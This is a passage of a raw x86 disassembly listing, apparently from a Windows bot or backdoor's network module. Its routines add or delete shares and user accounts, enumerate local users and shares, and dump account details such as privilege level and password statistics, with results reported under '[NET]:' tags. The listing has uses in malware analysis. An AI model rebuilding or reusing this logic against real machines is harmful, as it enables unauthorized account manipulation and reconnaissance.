push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_40A1E0
loc_40A27A: ; CODE XREF: sub_40A15D+77�j
cmp [ebp+var_8], ebx
jnz loc_40A195
loc_40A283: ; CODE XREF: sub_40A15D+6C�j
push [ebp+var_C]
call dword_44B5C4 ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_40A15D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A29A proc near ; CODE XREF: sub_40C50A+20E5�p
; sub_40C50A+20FD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40A333
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40A2C3
dec eax
jnz short loc_40A313
push edi
push 0
call sub_40A46C
pop ecx
pop ecx
jmp short loc_40A30F
; ---------------------------------------------------------------------------
loc_40A2C3: ; CODE XREF: sub_40A29A+18�j
cmp [ebp+arg_8], 0
jnz short loc_40A301
push 24h
push edi
call sub_4199F0
pop ecx
test eax, eax
pop ecx
jnz short loc_40A301
push 57h
pop eax
loc_40A2DA: ; CODE XREF: sub_40A29A+77�j
push eax
call sub_40AC44
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_44BCB4
push off_43A4D0[eax*4]
push offset aNetSErrorWithS ; "[NET]: %s: Error with share: '%s'. %s"
push esi
call sub_418D70
add esp, 18h
jmp short loc_40A353
; ---------------------------------------------------------------------------
loc_40A301: ; CODE XREF: sub_40A29A+2D�j
; sub_40A29A+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_40A3C0
add esp, 0Ch
loc_40A30F: ; CODE XREF: sub_40A29A+27�j
test eax, eax
jnz short loc_40A2DA
loc_40A313: ; CODE XREF: sub_40A29A+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_44BCB4
push off_43A4D4[eax*4]
push offset aNetSShareS_ ; "[NET]: %s share: '%s'."
push esi
call sub_418D70
add esp, 10h
jmp short loc_40A353
; ---------------------------------------------------------------------------
loc_40A333: ; CODE XREF: sub_40A29A+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_44BCB4
lea eax, [eax+eax*2]
push off_43A4D0[eax*4]
push offset aNetSNoShareSpe ; "[NET]: %s: No share specified."
push esi
call sub_418D70
add esp, 0Ch
loc_40A353: ; CODE XREF: sub_40A29A+65�j
; sub_40A29A+97�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_40A29A endp
; =============== S U B R O U T I N E =======================================
sub_40A359 proc near ; CODE XREF: sub_413B31+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_40A366
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A366: ; CODE XREF: sub_40A359+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_4943B0
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi
test byte_44BEB4, 1
mov ebp, eax
jnz short loc_40A3A3
or byte_44BEB4, 1
lea eax, [ebp+1]
push eax
call sub_41B010
pop ecx
mov dword_44BC54, eax
loc_40A3A3: ; CODE XREF: sub_40A359+32�j
push esi
push esi
push ebp
push dword_44BC54
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi
mov eax, dword_44BC54
pop edi
pop ebp
pop ebx
pop esi
retn
sub_40A359 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A3C0 proc near ; CODE XREF: sub_40A29A+6D�p
; sub_413E55+184�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_40A42B
push [ebp+arg_4]
mov edi, eax
call sub_40A42B
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_4199F0
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_40A42B
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call dword_44B5C0
pop edi
leave
retn
sub_40A3C0 endp
; =============== S U B R O U T I N E =======================================
sub_40A42B proc near ; CODE XREF: sub_40A3C0+A�p
; sub_40A3C0+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_40A438
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40A438: ; CODE XREF: sub_40A42B+9�j
push ebx
push esi
mov esi, ds:dword_4942D4
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_41B010
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_40A42B endp
; =============== S U B R O U T I N E =======================================
sub_40A46C proc near ; CODE XREF: sub_40A29A+20�p
; sub_413B31+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40A42B
push [esp+8+arg_4]
mov esi, eax
call sub_40A42B
pop ecx
pop ecx
push 0
push eax
push esi
call dword_44B598
pop esi
retn
sub_40A46C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A48F proc near ; CODE XREF: sub_40C50A+2129�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_40A42B
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 18h
loc_40A4C8: ; CODE XREF: sub_40A48F+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call dword_44B60C
mov ebx, eax
cmp ebx, esi
jz short loc_40A52B
cmp ebx, 0EAh
jz short loc_40A52B
push ebx
push ebx
call sub_40AC44
pop ecx
push eax
lea eax, [ebp+var_210]
push offset aNetShareListEr ; "[NET]: Share list error: %s <%ld>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 24h
jmp short loc_40A598
; ---------------------------------------------------------------------------
loc_40A52B: ; CODE XREF: sub_40A48F+5D�j
; sub_40A48F+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_40A58F
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_40A539: ; CODE XREF: sub_40A48F+FC�j
push dword ptr [esi+10h]
call dword_44B5B4 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40A550
mov eax, offset aNo ; "No"
loc_40A550: ; CODE XREF: sub_40A48F+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_40A539
xor esi, esi
loc_40A58F: ; CODE XREF: sub_40A48F+A2�j
push [ebp+var_4]
call dword_44B750
loc_40A598: ; CODE XREF: sub_40A48F+9A�j
cmp ebx, 0EAh
jz loc_40A4C8
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40A48F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5B0 proc near ; CODE XREF: sub_40C50A+217D�p
; sub_40C50A+21A4�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_40A654
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_40A5F2
dec eax
jz short loc_40A5E7
dec eax
jnz short loc_40A60D
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_40A6F6
add esp, 14h
jmp short loc_40A609
; ---------------------------------------------------------------------------
loc_40A5E7: ; CODE XREF: sub_40A5B0+1D�j
push ebx
push edi
call sub_40A6D5
pop ecx
pop ecx
jmp short loc_40A609
; ---------------------------------------------------------------------------
loc_40A5F2: ; CODE XREF: sub_40A5B0+1A�j
cmp [ebp+arg_8], edi
jz short loc_40A606
push [ebp+arg_8]
push ebx
push edi
call sub_40A67B
add esp, 0Ch
jmp short loc_40A609
; ---------------------------------------------------------------------------
loc_40A606: ; CODE XREF: sub_40A5B0+45�j
push 57h
pop eax
loc_40A609: ; CODE XREF: sub_40A5B0+35�j
; sub_40A5B0+40�j ...
cmp eax, edi
jnz short loc_40A62D
loc_40A60D: ; CODE XREF: sub_40A5B0+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_44BEB8
push off_43A4D4[eax*4]
push offset aNetSUsernameS_ ; "[NET]: %s username: '%s'."
push esi
call sub_418D70
add esp, 10h
jmp short loc_40A674
; ---------------------------------------------------------------------------
loc_40A62D: ; CODE XREF: sub_40A5B0+5B�j
push eax
call sub_40AC44
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_44BEB8
push off_43A4D0[eax*4]
push offset aNetSErrorWithU ; "[NET]: %s: Error with username: '%s'. %"...
push esi
call sub_418D70
add esp, 18h
jmp short loc_40A674
; ---------------------------------------------------------------------------
loc_40A654: ; CODE XREF: sub_40A5B0+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_44BEB8
lea eax, [eax+eax*2]
push off_43A4D0[eax*4]
push offset aNetSNoUsername ; "[NET]: %s: No username specified."
push esi
call sub_418D70
add esp, 0Ch
loc_40A674: ; CODE XREF: sub_40A5B0+7B�j
; sub_40A5B0+A2�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40A5B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A67B proc near ; CODE XREF: sub_40A5B0+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_40A42B
push [ebp+arg_4]
mov edi, eax
call sub_40A42B
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_40A42B
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_44B5A4
pop edi
leave
retn
sub_40A67B endp
; =============== S U B R O U T I N E =======================================
sub_40A6D5 proc near ; CODE XREF: sub_40A5B0+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_40A42B
push [esp+8+arg_4]
mov esi, eax
call sub_40A42B
pop ecx
pop ecx
push eax
push esi
call dword_44B594
pop esi
retn
sub_40A6D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6F6 proc near ; CODE XREF: sub_40A5B0+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_40A42B
push [ebp+arg_4]
mov esi, eax
call sub_40A42B
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_44B718
test eax, eax
mov [ebp+arg_0], eax
jnz loc_40AA83
mov eax, [ebp+var_4]
test eax, eax
jz loc_40AABE
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_418D70
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
add esp, 40h
mov eax, [eax+10h]
sub eax, 0
jz short loc_40A80F
dec eax
jz short loc_40A808
dec eax
jz short loc_40A801
mov eax, offset aUnknown_1 ; "Unknown"
jmp short loc_40A814
; ---------------------------------------------------------------------------
loc_40A801: ; CODE XREF: sub_40A6F6+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_40A814
; ---------------------------------------------------------------------------
loc_40A808: ; CODE XREF: sub_40A6F6+FF�j
mov eax, offset aUser_0 ; "User"
jmp short loc_40A814
; ---------------------------------------------------------------------------
loc_40A80F: ; CODE XREF: sub_40A6F6+FC�j
mov eax, offset aGuest ; "Guest"
loc_40A814: ; CODE XREF: sub_40A6F6+109�j
; sub_40A6F6+110�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
loc_40A896: ; DATA XREF: .data:00435644�o
; .data:00435688�o ...
push offset aParametersS ; "Parameters: %S"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_40842D
add esp, 20h
pop edi
pop ebx
jmp short loc_40AAAF
; ---------------------------------------------------------------------------
loc_40AA83: ; CODE XREF: sub_40A6F6+35�j
push eax
lea eax, [ebp+var_204]
push offset aNetUserInfoErr ; "[NET]: User info error: <%ld>"
push eax
call sub_418D70
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40842D
add esp, 20h
loc_40AAAF: ; CODE XREF: sub_40A6F6+38B�j
cmp [ebp+var_4], 0
jz short loc_40AABE
push [ebp+var_4]
call dword_44B750
loc_40AABE: ; CODE XREF: sub_40A6F6+40�j
; sub_40A6F6+3BD�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_40A6F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AAC4 proc near ; CODE XREF: sub_40C50A+21E1�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_40A42B
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 18h
loc_40AB03: ; CODE XREF: sub_40AAC4+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call dword_44B628
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_40AB64
cmp eax, 0EAh
jz short loc_40AB64
push eax
push eax
call sub_40AC44
pop ecx
push eax
lea eax, [ebp+var_218]
push offset aNetUserListErr ; "[NET]: User list error: %s <%ld>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 24h
jmp short loc_40ABDF
; ---------------------------------------------------------------------------
loc_40AB64: ; CODE XREF: sub_40AAC4+62�j
; sub_40AAC4+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_40ABF2
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_40ABDF
loc_40AB76: ; CODE XREF: sub_40AAC4+ED�j
cmp edi, esi
jz short loc_40ABB5
push dword ptr [edi]
lea eax, [ebp+var_218]
push offset aS_8 ; " %S"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_40AB76
jmp short loc_40ABDF
; ---------------------------------------------------------------------------
loc_40ABB5: ; CODE XREF: sub_40AAC4+B4�j
lea eax, [ebp+var_218]
push offset aNetAnAccessVio ; "[NET]: An access violation has occured."...
push eax
call sub_418D70
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 1Ch
loc_40ABDF: ; CODE XREF: sub_40AAC4+9E�j
; sub_40AAC4+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_40ABF2
push edi
call dword_44B750
xor edi, edi
mov [ebp+var_4], edi
loc_40ABF2: ; CODE XREF: sub_40AAC4+A5�j
; sub_40AAC4+120�j
cmp [ebp+var_C], 0EAh
jz loc_40AB03
cmp edi, esi
jz short loc_40AC0A
push edi
call dword_44B750
loc_40AC0A: ; CODE XREF: sub_40AAC4+13D�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_418D70
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_40AAC4 endp
; =============== S U B R O U T I N E =======================================
sub_40AC44 proc near ; CODE XREF: sub_40A29A+41�p
; sub_40A48F+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_40ACF6
jz loc_40ACEF
cmp eax, 7Bh
ja short loc_40ACBB
jz short loc_40ACB1
cmp eax, 5
jz short loc_40ACA7
cmp eax, 8
jz short loc_40AC9D
cmp eax, 32h
jz short loc_40AC93
cmp eax, 35h
jz short loc_40AC89
cmp eax, 57h
jnz loc_40AD45
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40AC89: ; CODE XREF: sub_40AC44+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40AC93: ; CODE XREF: sub_40AC44+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40AC9D: ; CODE XREF: sub_40AC44+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40ACA7: ; CODE XREF: sub_40AC44+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40ACB1: ; CODE XREF: sub_40AC44+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40ACBB: ; CODE XREF: sub_40AC44+1A�j
sub eax, 7Ch
jz short loc_40ACE8
sub eax, 7C8h
jz short loc_40ACE1
dec eax
jz short loc_40ACD7
dec eax
jnz short loc_40AD45
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40ACD7: ; CODE XREF: sub_40AC44+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40ACE1: ; CODE XREF: sub_40AC44+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40ACE8: ; CODE XREF: sub_40AC44+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40ACEF: ; CODE XREF: sub_40AC44+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40ACF6: ; CODE XREF: sub_40AC44+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_40AD2F
jz short loc_40AD28
sub eax, 8ADh
jz short loc_40AD5A
dec eax
dec eax
jz short loc_40AD21
dec eax
jz short loc_40AD1A
dec eax
dec eax
jnz short loc_40AD45
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40AD1A: ; CODE XREF: sub_40AC44+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40AD21: ; CODE XREF: sub_40AC44+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40AD28: ; CODE XREF: sub_40AC44+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40AD2F: ; CODE XREF: sub_40AC44+B9�j
sub eax, 8CAh
jz short loc_40AD61
sub eax, 17h
jz short loc_40AD5A
sub eax, 25h
jz short loc_40AD53
sub eax, 29h
jz short loc_40AD4C
loc_40AD45: ; CODE XREF: sub_40AC44+35�j
; sub_40AC44+87�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40AD4C: ; CODE XREF: sub_40AC44+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40AD53: ; CODE XREF: sub_40AC44+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40AD5A: ; CODE XREF: sub_40AC44+C2�j
; sub_40AC44+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_40AD66
; ---------------------------------------------------------------------------
loc_40AD61: ; CODE XREF: sub_40AC44+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_40AD66: ; CODE XREF: sub_40AC44+40�j
; sub_40AC44+4A�j ...
push offset dword_44BC58
call sub_418D70
pop ecx
mov eax, offset dword_44BC58
pop ecx
retn
sub_40AC44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AD78 proc near ; CODE XREF: sub_40C50A+2220�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_41B060
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call ds:dword_4943B4
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_41B060
lea eax, [ebp+var_718]
push eax
call sub_41B030
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call dword_44B6D0
test eax, eax
jnz short loc_40AE08
mov esi, offset dword_44BA54
push offset aNetMessageSent ; "[NET]: Message sent successfully."
push esi
call sub_418D70
pop ecx
pop ecx
jmp short loc_40AE31
; ---------------------------------------------------------------------------
loc_40AE08: ; CODE XREF: sub_40AD78+7A�j
